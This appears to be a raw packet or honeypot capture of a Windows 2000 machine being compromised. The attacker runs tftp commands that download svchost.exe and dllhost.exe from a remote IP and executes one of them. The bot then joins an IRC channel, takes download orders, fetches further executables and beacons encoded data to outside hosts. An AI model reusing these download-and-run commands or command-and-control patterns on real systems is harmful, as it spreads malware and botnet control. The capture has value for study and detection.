VICTIM: Microsoft Windows 2000 [Version 5.00.2195]
VICTIM: (C) Copyright 1985-2000 Microsoft Corp.
        C:\\WINNT\\system32>
VICTIM: dir wins\\dllhost.exe
VICTIM: Volume in drive C has no label.
        Volume Serial Number is F07B-A028
        Directory of C:\\WINNT\\system32\\wins
        File Not Found
        C:\\WINNT\\system32>
VICTIM: dir dllcache\\tftpd.exe
VICTIM: Volume in drive C has no label.
        Volume Serial Number is F07B-A028
        Directory of C:\\WINNT\\system32\\dllcache
        File Not Found
        C:\\WINNT\\system32>
VICTIM: tftp -i 211.215.111.89 get svchost.exe wins\\SVCHOST.EXE
VICTIM: \000\001svchost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000'
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: \000\004\0003
VICTIM: \000\004\0004
VICTIM: \000\004\0005
VICTIM: \000\004\0006
VICTIM: \000\004\0007
VICTIM: \000\004\0008
VICTIM: \000\004\0009
VICTIM: \000\004\000:
VICTIM: \000\004\000;
VICTIM: \000\004\000<
VICTIM: \000\004\000=
VICTIM: \000\004\000>
VICTIM: \000\004\000?
VICTIM: \000\004\000@
VICTIM: \000\004\000A
VICTIM: \000\004\000B
VICTIM: \000\004\000C
VICTIM: \000\004\000D
VICTIM: \000\004\000E
VICTIM: Transfer successful: 35088 bytes in 12 seconds, 2924 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: tftp -i 211.215.111.89 get dllhost.exe wins\\DLLHOST.EXE
VICTIM: \000\004\000\001
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: \000\004\0003
VICTIM: Transfer successful: 25600 bytes in 9 seconds, 2844 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: wins\\DLLHOST.EXE
VICTIM: NICK jyqgvpxo
        USER r020500 . . :_
VICTIM: Service Pack 2
        JOIN &virtu
ATTACKER: :u. PRIVMSG jyqgvpxo :!get http:/image.perfectexe.com/kp.exe
          :u. PRIVMSG jyqgvpxo :!get http:/www.derquda.com/kb9.txt
VICTIM: GET /kp.exe HTTP/1.0
        User-Agent: Download
        Host: image.perfectexe.com
        Pragma: no-cache
ATTACKER: GET /kb9.txt HTTP/1.0
          User-Agent: Download
          Host: www.derquda.com
          Pragma: no-cache
ATTACKER: GET /ert/nop4.txt HTTP/1.0
          User-Agent: Microsoft Internet Explorer
          Host: www.derquda.com
          Pragma: no-cache
ATTACKER: GET /ert/mno3.txt HTTP/1.0
          User-Agent: Microsoft Internet Explorer
          Host: www.derquda.com
          Pragma: no-cache
ATTACKER: GET /ert/klm1.txt HTTP/1.0
          User-Agent: Microsoft Internet Explorer
          Host: www.derquda.com
          Pragma: no-cache
ATTACKER: GET /ert/lmn2.txt HTTP/1.0
          User-Agent: Microsoft Internet Explorer
          Host: www.derquda.com
          Pragma: no-cache
ATTACKER: GET /list.php?c=637B76A1D66060CC75920A2203465E8F28B12A11381A3EA94B7CBBFAD87FA69E7B45362B87F07B1597EE4ED43C79A785748ED32497EE1A40D2BD&v=2&t=0.1084558 HTTP/1.0
          User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
          Host: exe3.perfectexe.com:255
          Connection: Keep-Alive
          Pragma: no-cache
ATTACKER: GET /list.php?c=A4BCF4239B2D51FDE20501295D189041D24B6A51B7950196427514550DAA4A72CFF178650077503E582149D38ACFFDDFB24857A04A3340119EEA&v=2&t=0.8562586 HTTP/1.0
          User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
          Host: bestkind.ru
          Connection: Keep-Alive
          Pragma: no-cache
ATTACKER: GET /upload/int.exe?t=0.4614527 HTTP/1.0
          User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
          Host: anotherdomainname.in
          Connection: Keep-Alive
          Pragma: no-cache
ATTACKER: GET /sn.php?c=F2EC7490EB7BBE6C11FE6A5A5720D639FC634D28FDAC39F20D69A6E39139E2C829665146CEA1ABF58BB732AD5D53ABB3C33A249AF98DC2E3FE9B329BD1AA720387FB0A762DFCF16E8EB4AED455BB7CA328DF6D50AED0EDEB983A127F27CF90E4CD9B5B51D3C8339F2B98AD2AD7D77CE68F78052A87C07F588DD4325DCC7A902EFBF142EEC9E456E9B4823A68BE79215D&t=0.2036402 HTTP/1.0
          User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
          Host: bestkind.ru
          Connection: Keep-Alive
          Pragma: no-cache
ATTACKER: GET /sn.php?c=C4DA29CD6AFA09DBF718FDCDEC9BCB241A859EFB2F7ECF04E783EBAE67CF0B21CB84B0A7006FC59B497578E72A24031B9960A31D95E1446596F3B81179026D1CD7ABFB87DA0B06991B2143390AE4A679EA1D063B6F11ACAA79DBB6DB866E3044CE98505A28333995269531A70DF431B994612C728EDD96A7EAFEDBAEAF0DF10BDCCC329B5C680CCA63595A03F33360E360BF&t=0.9305384 HTTP/1.0
          User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
          Host: bestkind.ru
          Connection: Keep-Alive
          Pragma: no-cache
ATTACKER: GET /1.exe?t=0.8443872 HTTP/1.0
          User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
          Host: 109.196.143.133
          Connection: Keep-Alive
          Pragma: no-cache
ATTACKER: GET /sn.php?c=0D134EAAFC6C528222C8664CED9A13D063FB5A633665128A1D2A4E393593C39F3F6F859CF3CA9BA8BF8932A8AA977F6739FE8B6384E87D2CD9E92055A6DCBAD17C2C6BCF6DB8AB341228A8D2F719885747B0E6DBE698FEF862C05F32608824506D3B050F5A41B11D96255DDA17176CF6D52290BFEBACE3C4CF96BFD045F360DEFAFE983EECD919DF03362777894DA724&t=0.9154932 HTTP/1.0
          User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
          Host: bestkind.ru
          Connection: Keep-Alive
          Pragma: no-cache
ATTACKER: GET /sn.php?c=D1CF7692E77727F7A349A9839BEC65A61880FEC7C390BD25E0D774032D8B5509D989879E3D048DBE3107BA203508362ECB0C739BB3DFFEAFE5D50B7E7B012F44F7A7268277A29A05DEE4403AFC12CD1239CE89B44F318D8B14B6F39E688080F4C3958983F6ED298511A20294A25B19919B6E96C898CB64567662106544E653A9180825815969589F7542045118DA47C768B2&t=0.2981836 HTTP/1.0
          User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
          Host: bestkind.ru
          Connection: Keep-Alive
          Pragma: no-cache
ATTACKER: GET /tm/out.exe?t=8.446902E-02 HTTP/1.0
          User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
          Host: www.derquda.com
          Connection: Keep-Alive
          Pragma: no-cache
ATTACKER: PONG :k.
VICTIM: JOIN &virtu
ATTACKER: PONG :k.
VICTIM: JOIN &virtu
ATTACKER: PONG :k.
VICTIM: JOIN &virtu